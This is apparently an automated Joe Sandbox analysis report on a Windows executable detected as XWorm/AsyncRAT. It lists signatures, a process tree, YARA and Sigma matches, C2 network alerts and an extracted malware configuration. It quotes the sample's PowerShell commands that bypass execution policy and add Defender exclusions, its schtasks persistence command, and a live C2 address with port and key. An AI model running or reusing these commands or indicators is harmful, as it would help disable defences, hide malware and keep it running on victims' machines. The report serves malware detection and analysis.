Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565292
MD5:9ff920c7c3199dbfff9b507272c9f65a
SHA1:8a588fb79066649adcdf2f5f1614d6858f0e4ac6
SHA256:f790a1104f5eec4b7c03064d9063c9e69d1f55e5bce27ad83474fb2aa00310e9
Tags:NETexeMSILuser-jstrosch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 5668 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9FF920C7C3199DBFFF9B507272C9F65A)
    • powershell.exe (PID: 7020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Word.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Word.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 8084 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Word.exe (PID: 8184 cmdline: C:\Users\user\AppData\Roaming\Word.exe MD5: 9FF920C7C3199DBFFF9B507272C9F65A)
  • Word.exe (PID: 4016 cmdline: "C:\Users\user\AppData\Roaming\Word.exe" MD5: 9FF920C7C3199DBFFF9B507272C9F65A)
  • Word.exe (PID: 4308 cmdline: "C:\Users\user\AppData\Roaming\Word.exe" MD5: 9FF920C7C3199DBFFF9B507272C9F65A)
  • Word.exe (PID: 316 cmdline: C:\Users\user\AppData\Roaming\Word.exe MD5: 9FF920C7C3199DBFFF9B507272C9F65A)
  • cleanup
{"C2 url": ["103.230.121.124"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_XWormYara detected XWormJoe Security
    file.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      file.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xe99e:$s6: VirtualBox
      • 0xe8fc:$s8: Win32_ComputerSystem
      • 0x100de:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x1017b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x10290:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xf656:$cnc4: POST / HTTP/1.1
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\Word.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\Word.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Roaming\Word.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xe99e:$s6: VirtualBox
          • 0xe8fc:$s8: Win32_ComputerSystem
          • 0x100de:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x1017b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x10290:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xf656:$cnc4: POST / HTTP/1.1
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xf416:$s6: VirtualBox
            • 0xf374:$s8: Win32_ComputerSystem
            • 0x10b56:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x10bf3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x10d08:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x100ce:$cnc4: POST / HTTP/1.1
            00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xe79e:$s6: VirtualBox
              • 0xe6fc:$s8: Win32_ComputerSystem
              • 0xfede:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xff7b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x10090:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xf456:$cnc4: POST / HTTP/1.1
              00000000.00000002.2523388920.0000000002681000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                Click to see the 1 entries
                SourceRuleDescriptionAuthorStrings
                0.0.file.exe.260000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  0.0.file.exe.260000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.0.file.exe.260000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xe99e:$s6: VirtualBox
                    • 0xe8fc:$s8: Win32_ComputerSystem
                    • 0x100de:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x1017b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x10290:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0xf656:$cnc4: POST / HTTP/1.1

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5668, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 7020, ProcessName: powershell.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5668, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 7020, ProcessName: powershell.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Word.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 5668, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Word
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5668, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 7020, ProcessName: powershell.exe
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 5668, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Word.lnk
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5668, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe", ProcessId: 8084, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5668, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 7020, ProcessName: powershell.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-29T15:20:20.696552+010028528701Malware Command and Control Activity Detected103.230.121.1247000192.168.2.749829TCP
                    2024-11-29T15:20:22.535915+010028528701Malware Command and Control Activity Detected103.230.121.1247000192.168.2.749806TCP
                    2024-11-29T15:20:28.820631+010028528701Malware Command and Control Activity Detected103.230.121.1247000192.168.2.749806TCP
                    2024-11-29T15:20:36.482297+010028528701Malware Command and Control Activity Detected103.230.121.1247000192.168.2.749806TCP
                    2024-11-29T15:20:50.495112+010028528701Malware Command and Control Activity Detected103.230.121.1247000192.168.2.749806TCP
                    2024-11-29T15:20:58.830595+010028528701Malware Command and Control Activity Detected103.230.121.1247000192.168.2.749806TCP
                    2024-11-29T15:21:04.426499+010028528701Malware Command and Control Activity Detected103.230.121.1247000192.168.2.749806TCP
                    2024-11-29T15:21:19.403961+010028528701Malware Command and Control Activity Detected103.230.121.1247000192.168.2.749806TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-29T15:20:15.806058+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:15.926061+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:16.046078+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:16.166168+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:16.287698+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:16.408129+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:16.528343+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:16.648418+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:16.888810+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.009313+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.132028+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.252230+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.376092+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.496165+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.660928+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.781033+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.901100+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.021425+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.141579+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.262076+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.424695+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.545159+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.665339+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.786270+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.906505+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.966388+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:19.086730+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:19.206697+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:19.327415+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:19.447502+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:19.567736+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:19.785059+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:19.905186+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:20.025248+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:20.145348+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:20.265461+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:20.381652+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:20.501705+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:20.622209+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:20.696654+010028529231Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:22.539252+010028529231Malware Command and Control Activity Detected192.168.2.749806103.230.121.1247000TCP
                    2024-11-29T15:20:36.485506+010028529231Malware Command and Control Activity Detected192.168.2.749806103.230.121.1247000TCP
                    2024-11-29T15:20:50.497403+010028529231Malware Command and Control Activity Detected192.168.2.749806103.230.121.1247000TCP
                    2024-11-29T15:21:04.428611+010028529231Malware Command and Control Activity Detected192.168.2.749806103.230.121.1247000TCP
                    2024-11-29T15:21:19.404980+010028529231Malware Command and Control Activity Detected192.168.2.749806103.230.121.1247000TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-29T15:20:28.820631+010028528741Malware Command and Control Activity Detected103.230.121.1247000192.168.2.749806TCP
                    2024-11-29T15:20:58.830595+010028528741Malware Command and Control Activity Detected103.230.121.1247000192.168.2.749806TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-29T15:20:15.806058+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:15.926061+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:16.046078+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:16.166168+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:16.287698+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:16.408129+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:16.528343+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:16.648418+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:16.888810+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.009313+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.132028+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.252230+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.376092+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.496165+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.660928+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.781033+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:17.901100+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.021425+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.141579+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.262076+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.424695+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.545159+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.665339+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.786270+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.906505+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:18.966388+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:19.086730+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:19.206697+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:19.327415+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:19.447502+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:19.567736+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:19.785059+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:19.905186+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:20.025248+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:20.145348+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:20.265461+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:20.381652+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:20.501705+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:20.622209+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    2024-11-29T15:20:20.696654+010028528731Malware Command and Control Activity Detected192.168.2.749829103.230.121.1247000TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-29T15:20:35.886539+010028559241Malware Command and Control Activity Detected192.168.2.749806103.230.121.1247000TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-29T15:20:15.306150+010028531911Malware Command and Control Activity Detected103.230.121.1247000192.168.2.749806TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-29T15:20:14.029990+010028531921Malware Command and Control Activity Detected192.168.2.749806103.230.121.1247000TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: file.exeAvira: detected
                    Source: C:\Users\user\AppData\Roaming\Word.exeAvira: detection malicious, Label: TR/Spy.Gen
                    Source: file.exeMalware Configuration Extractor: Xworm {"C2 url": ["103.230.121.124"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                    Source: C:\Users\user\AppData\Roaming\Word.exeReversingLabs: Detection: 76%
                    Source: file.exeReversingLabs: Detection: 76%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\Word.exeJoe Sandbox ML: detected
                    Source: file.exeJoe Sandbox ML: detected
                    Source: file.exeString decryptor: 103.230.121.124
                    Source: file.exeString decryptor: 7000
                    Source: file.exeString decryptor: <123456789>
                    Source: file.exeString decryptor: <Xwormmm>
                    Source: file.exeString decryptor: MicrosoftWord
                    Source: file.exeString decryptor: USB.exe
                    Source: file.exeString decryptor: %AppData%
                    Source: file.exeString decryptor: Word.exe
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFAAC494667h0_2_00007FFAAC493E45
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFAAC494667h0_2_00007FFAAC493E45
